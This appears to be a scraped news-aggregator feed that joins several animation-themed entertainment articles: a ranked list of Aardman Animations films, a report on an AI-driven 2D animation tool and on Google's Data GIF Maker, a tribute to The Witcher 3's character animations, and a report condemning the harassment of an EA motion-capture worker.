One of the great underrated purveyors of modern family entertainment, Aardman Animations has been comfortably chugging out feature films and shorts over the last 30 years to acclaim from critics and audiences alike. Over the last few years, Aardman’s stop-motion style has been matched in the United States by the Laika studio, with its ambitious storytelling in Coraline and Kubo and the Two Strings, among others. But this past weekend, Aardman’s newest movie, Early Man, got to take center stage as a form of counter-programming against Black Panther.

With Early Man in theaters, it’s time to look at the whole of Aardman’s feature-length output with this ranking. So, do like Wallace and grab the nearest cheesy snack, and dig in.

7. Flushed Away

There’s something very strange about watching Aardman characters in a computer-animated environment. Flushed Away, the last film Aardman made with DreamWorks SKG, isn’t the only film from the studio that’s computer-animated, but it is easily their worst. It features big stars —  Hugh Jackman, Kate Winslet, and Ian McKellen — and the kind of premise that people feared would sink Pixar’s Ratatouille, which opened the summer after this film. Ratatouille proved that you can make an animated film about rats without it being disgusting. Flushed Away, from its very title, leans far too much into the opposite scenario. There’s some humor here — with Aardman, how could there not be? — but Flushed Away is best left…well, you know.

6. Early Man

The latest film from Aardman, and the first film from director Nick Park in over a decade, is pleasant and charming, but a little too lightweight relative to the rest of the studio’s output. Set during the Age of Bronze, Early Man is essentially an underdog sports comedy with lots of cavemen playing European football. Eddie Redmayne and Tom Hiddleston voice the hero and villain, respectively; while Hiddleston gets the showier role as a greedy French bad guy, the humor is rarely as sharp as in Aardman’s earlier films and the film’s absurdity comes in fits and starts. Some of the film’s best characters don’t speak at all, like our hero’s pet hog and a giant, fanged duck who ends up helping out the good guys near the end. Early Man has its charms, but is still kind of a letdown.

5. Arthur Christmas

To date, there really is just one genuinely weak Aardman Animations film. The studio doesn’t make nearly as many films as Pixar or DreamWorks or Disney, but that also means that their success rate is pretty high. I say this because I know that Arthur Christmas has a lot of fans, and some of them may be displeased at the film’s placement here. I like this movie! It’s funny! But it’s not…quite as good as Aardman’s other films, even in the one case where the film’s lead is someone whose current status in Hollywood is deservedly quite shaky. Arthur Christmas loses some points for me for the same reason Flushed Away does: it just feels wrong to see an Aardman movie in CGI. The story and cast are charming enough, and Aardman’s play on Christmas can be funny enough, but the visuals always give me pause. That said, it’s a perfectly decent modern holiday standard.

4. The Pirates! In an Adventure with Scientists!

Earlier this year, American audiences — too few of them, but that’s a different discussion — got to delight at the image of Hugh Grant fully committing to his performance opposite a CGI bear in Paddington 2. (You know, the current best film of 2018. It’ll change eventually, but not yet. I digress.) But Grant is no stranger to the wry English family film, as evidenced by his leading voice performance in Aardman’s The Pirates! In an Adventure With Scientists!. (In the States, the movie was called The Pirates! Band of Misfits, because apparently scientists are just the absolute pits for box office.) The pirates depicted here, led by Grant, are less vicious and more doofy and ridiculous. So of course Grant’s typically friendly but awkward personality fits in quite well here, as do fellow voice performers David Tennant, Imelda Staunton, and Martin Freeman. This one’s not Aardman’s finest, but also a bit underrated relative to the studio’s other content.

3. Wallace and Gromit: The Curse of the Were-Rabbit

If any characters from Aardman Animations were ever going to inspire a feature film, it would have to be the company’s most memorable creations, Wallace and Gromit. While the well-meaning Englishman and his much savvier dog make for a dynamic duo, their feature debut is nowhere near as brilliant as the short films in which they appeared in the 1990s, in spite of being charming and keeping with the style of those shorts. There’s nothing exactly…wrong with The Curse of the Were-Rabbit, but the feature proves one thing: Wallace and Gromit work best in smaller doses. This feature, in expanding one of their adventures, includes a requisite romance, among other subplots. It’s enjoyable! But the shorts are so, so much better.

2. Chicken Run

Time has been…somewhat unkind to Chicken Run, the first Aardman Animations feature film. On one hand, the film’s depiction of a group of chickens trying to escape the clutches of a vicious farmer and his wife showcases Aardman’s expressive and detailed stop-motion animation, as well as the filmmakers’ penchant for intense and crazily designed action sequences. On the other hand, Mel Gibson. In 2000, having Mel Gibson star as the big-name lead of an animated film wasn’t a big deal (aside from him lending his star power to the project). While some folks already knew Aardman from the Wallace and Gromit shorts, many people were being introduced to the studio with this film, and why not have Mad Max in the picture to ease people into Aardman’s British sensibilities? But in 2018, Mel Gibson’s involvement makes this an awkward viewing. The movie is still quite funny, and one of Aardman’s best, but it’s also impossible to ignore how uncomfortable hearing the voice of Mel Gibson in such a heroic character.

1. Shaun the Sheep Movie

This may be a hot take, but I’ll say it: the best Wallace and Gromit-adjacent movie doesn’t even feature either of the title characters. Shaun the Sheep first appeared in the wonderful short A Close Shave, and was eventually spun off into his own TV show, which led to this equally wonderful 2015 feature film. Shaun the Sheep Movie eschews dialogue in favor of sight gags, grunted sound effects, and more. The premise is light and lean — the sheep on an English farm are left to their own devices when their farmer gets conked on the head and gets amnesia, and they all wind up in the Big City — and allows directors Mark Burton and Richard Starzak to utilize all sorts of sly jokes in the madcap adventure. Shaun the Sheep Movie did well enough worldwide — it made barely $ 20 million in the States — that it’s going to have a sequel next year, which has a very high bar to clear now.

Pixar veteran creates A.I. tool for automating 2D animations https://briefnews.eu/pixar-veteran-creates-a-i-tool-for-automating-2d-animations/ https://briefnews.eu/pixar-veteran-creates-a-i-tool-for-automating-2d-animations/#respond Fri, 02 Jun 2017 23:18:01 +0000 http://briefnews.eu/pixar-veteran-creates-a-i-tool-for-automating-2d-animations/

Artificial intelligence is going to change just about everything — like animating video games, for example.

Animation-technology startup Midas Touch Interactive has a new tool called Midas Creature, which the company claims can automate the process of creating complicated animations for two-dimensional characters. Developer Jiayi Chong created Midas Creature using his experience from working on films like Toy Story 3, Wall-E, and Up while at Pixar. With Midas Creature, artists and designers give instructions to an automated engine, and the software interprets the character and figures out how it would move.

Midas is positioning this as an alternative to traditional animation techniques like key framing and Flash. It is available now on Midas’s store in two flavors: “Enterprise” and “Indie.” Creature Enterprise is the full-featured option that works as an annual subscription. Creature Indie has all of the same features, but it is is for studios that grow less than $ 100,000 in revenues annually. Indie comes with a 30-day license for $ 20.

“Midas Creature is the ideal pipeline for game developers and anyone else looking for a more powerful, efficient, and easy-to-use 2D animation process,” Midas Touch Interactive chief executive Kevin He said in a statement. “The Directable Automated Animation Engine of Midas Creature allows you to create animations you might have previously thought impossible with key frame or Flash animation.”

While hair and cloth are difficult to animate with some tools, He says that Creature can make those objects “flutter in the wind.” This software is also capable of translating motion-capture data from 3D to 2D.

This new product from Midas Touch is part of the company’s founding beliefs in a new kind of intelligent procedural animation technology. When he started the company, He announced plans to bring that workflow breakthrough to film, virtual reality, augmented reality, and traditional games. And Chong’s Creature tool is the latest example of that mission.

“We’re very excited to have Jiayi on our team as he brings tremendous passion and expertise,” said He. “Which he utilizes to build and implement our next-gen A.I. driven physics-based animation pipeline helping to further establish Midas Touch Interactive as a burgeoning immersive entertainment technology expert developing cost-effective and deeply interactive content creation services.”

Google launches Data GIF Maker to help storytellers convey information through animations https://briefnews.eu/google-launches-data-gif-maker-to-help-storytellers-convey-information-through-animations/ https://briefnews.eu/google-launches-data-gif-maker-to-help-storytellers-convey-information-through-animations/#respond Fri, 26 May 2017 08:15:29 +0000 http://briefnews.eu/google-launches-data-gif-maker-to-help-storytellers-convey-information-through-animations/

In an age of ubiquitous computing and high-bandwidth video streaming capabilities from our pockets, the fact that the humble GIF continues to thrive is a remarkable feat. But its success is testament to the 30-year-old file format’s continued support, and ability to convey information (and entertain) without requiring huge processing power.

Indeed, GIFs continue to be used for many purposes, which is why Google has launched the Data Gif Maker, a tool aimed at helping journalists and storytellers convey information visually through simple animations.

“Data visualizations are an essential storytelling tool in journalism, and though they are often intricate, they don’t have to be complex,” said Simon Rogers, data editor at the Google News Lab, in a blog post. “In fact, with the growth of mobile devices as a primary method of consuming news, data visualizations can be simple images formatted for the device they appear on.”

The Data GIF Maker is pretty simple to use, though it is fairly narrow in scope. It’s basically designed to help people show how two competing “things” compare to each other in terms of popularity, such as sales of a particular product, or the frequency of two items in search engines, and requires the user to manually enter the information and then download the GIF.

Above: Data GIF: Batman vs. Superman

The advent of the internet and big data has given birth to a number of businesses that serve to help people make sense of the deluge of information at their disposal and tell meaningful stories. For example, Latvian infographics and data visualization company Infogram offers a slick WYSIWYG editor that converts users’ data into infographics that can be published or embedded anywhere, and earlier this month it was acquired by Prezi.

Other companies are making moves to monetize GIFs specifically. Last month Tenor launched real-time analytics tool, designed to educate marketers on using GIFs.

Google’s GIF effort is limited in its ambitions for now, but as an experiment it could be turbo-charged in the future to enable GIFs with far greater detail and multiple data points.

Some Of The Witcher 3’s Character Animations Are Still Blowing People Away https://briefnews.eu/some-of-the-witcher-3s-character-animations-are-still-blowing-people-away/ https://briefnews.eu/some-of-the-witcher-3s-character-animations-are-still-blowing-people-away/#respond Sun, 26 Mar 2017 22:02:01 +0000 http://briefnews.eu/some-of-the-witcher-3s-character-animations-are-still-blowing-people-away/

CD Projekt Red’s RPG masterpiece came out nearly two years ago, but damn does it still hold up. And recently, a handful of people’s favorite character animations from the game have been making the rounds.

Unsurprisingly, the renewed interest in the game’s storytelling and animation nuances comes in light of Mass Effect: Andromeda’s lackluster achievement on those fronts. Just over a week ago, the game’s facial expressions were put on blast as players finally got their hands on the game’s early sections thanks to EA Access. The uproar even led some people to be complete assholes and harass the people they believed to be responsible.

After playing a substantial portion of the game now, my sense is less that the character animations are bad than simply under-cooked and soulless. They get the job done, and while jet-pack thrusting from one alien planet ledge to another, I honestly didn’t think too much about it. While I haven’t fallen in love with any of the game’s characters, or been particularly struck by any of the story beats so far, it all feels serviceable enough and par for the course when it comes BioWare games. You all played Dragon Age: Inquisition, right?

But as I looked back at some of the conversations from The Witcher 3 going around I started to remember just how much the little personal touches in a character’s face or gesture can enliven the world and pull me into it as a player. (Beware: some of the things mentioned ahead could be considered spoilers).

Just look at Yennefer’s slight facial tick as she recalls the “one other trifling matter” she needs to discuss with Geralt once they are reunited for the first time in Skellige. Granted, the superb voice acting by Denise Gough and others in the game is doing a lot of work here, but so are things like the way she twitches her upper lip as she stares off into the room with haughty disdain for the chores that await her and Geralt.

Then there’s the way the rest of her body is led by her head as she turns to walk further into the room. She doesn’t simply shuffle in place as the characters discuss future quests and romance options, but moves like someone who would rather complain about work than open up to a close friend about the emotional turmoil they’ve both been going through (Ciri being hunted by ice zombies, death and destruction plaguing the mainland, and all that other good stuff). It all helps turn her character into something other than a marionette rehearsing a conversation tree.

The Bloody Barron remains one of the most interesting characters in the game. Wretched and mired in tragedy, much of which has been brought on by his own cruel doing, the character emotes on all cylinders such that even if you hate him it’s hard not to pity the poor bastard. After all, he had to dig up his stillborn child to try and fend off unknown evil. There’s simply no better symbol of the fallen state of The Witcher 3's world.

Him failing to correctly sheath his dagger after nearly being eaten alive by a Basilisk is one of those small moments that speaks volumes. Tyrannical and defiant most of the time, his body language lets slip the exhausted and failing man beneath that facade. It’s the daughter-figure Ciri who saves him rather than the other way around, and the way his mouth hangs agape after it all goes down highlights the moment without two minutes of dialogue being used to hammer the point home into oblivion.

And then there’s the ending of the “Hearts of Stone” DLC, in which Olgierd von Everec, if you’ve saved him, comes to terms with the burden of having his cursed life spared. Even though it’s shot at a sideways angle, the single furrowed brow and repeated slow blinking reinforce the the line he utters while doing so with the slightest of flourishes. Even if von Everec could go on, would he still want to?

Geralt tries to offer him some halfhearted reassurance as only Geralt can, but the way he shifts his head to look back at von Everec even though the man’s back is still turned hints at a dawning realization. As the shot blurs over von Everec’s face to bring Geralt’s into focus, the silent moment adds a deeper, more sinister layer to the man’s grief. In one regard, von Everec is just the latest in a series of never-ending sob stories the Witcher has encountered throughout the adventure. But the way both men’s faces point toward a level of misery that can’t quite be verbally articulated helps distinguish the end of the story lines from the dozens of similar ones that came before it.

Of course, there are plenty of other great character moments that don’t circle such a morbid drain. There’s queen Anna Henrietta’s impatience with Geralt’s patronizing machismo as well as Shani’s “get the fuck out of her eye roll” during a late night stroll. Plenty of people have made videos trying to capture their favorites.

For everything I love about Mass Effect: Andromeda, a game whose flaws I don’t have enough fingers to count but which continues to grow on me despite them, it’s no Witcher 3, at least when it comes to lovingly detailed and idiosyncratic moments of character animations. But then again few things are.

Scumbags Harass Woman For Working On Mass Effect: Andromeda’s Animations https://briefnews.eu/scumbags-harass-woman-for-working-on-mass-effect-andromedas-animations/ https://briefnews.eu/scumbags-harass-woman-for-working-on-mass-effect-andromedas-animations/#respond Sun, 19 Mar 2017 04:01:22 +0000 http://briefnews.eu/scumbags-harass-woman-for-working-on-mass-effect-andromedas-animations/

Internet cretins engaged in a harassment campaign against a woman who worked for Electronic Arts this weekend, flooding her social media and various internet profiles with vitriolic, often misogynistic messages. Her sin, it appears, was working on animations for the game Mass Effect: Andromeda.

Allie Rose-Marie Leost, who worked for EA’s motion-capture labs in Vancouver, saw vicious harassment on Twitter and other websites today, most often from people who blamed her for Andromeda’s awkward facial animations. The harassment appears to have been primarily triggered by a vile blog post at Ralph Retort, a right-wing, GamerGate-tied website, that claimed Leost was the lead facial animator on Andromeda. That website also accused her of performing sexual acts to get her job at EA.

Here’s a small sample of the hundreds of messages Leost faced today:

As often happens with these internet witch-hunts, the harassment campaign against Leost was based on false information. BioWare today released a statement clarifying that she was not, in fact, a lead animator on Mass Effect: Andromeda. (There has been some confusion over whether Leost’s social media posts indicated that she was a lead, but given that she worked at EA Labs and not at the Andromeda team’s offices in Montreal, it’s clear that’s not the case.)

BioWare also condemned the abuse with a statement this afternoon:

Leost did not immediately respond to an e-mail seeking comment.

Somehow, the attacks seem completely predictable despite how terrible they are. In the age of President Trump and GamerGate, it all feels straight out of some especially insecure and desperate playbook. Starting with the transformation of a game’s sometimes silly character animations into a conspiracy, and then later a scandal in which the data points waver between incomplete and meaningless, the cycle isn’t new by this point.
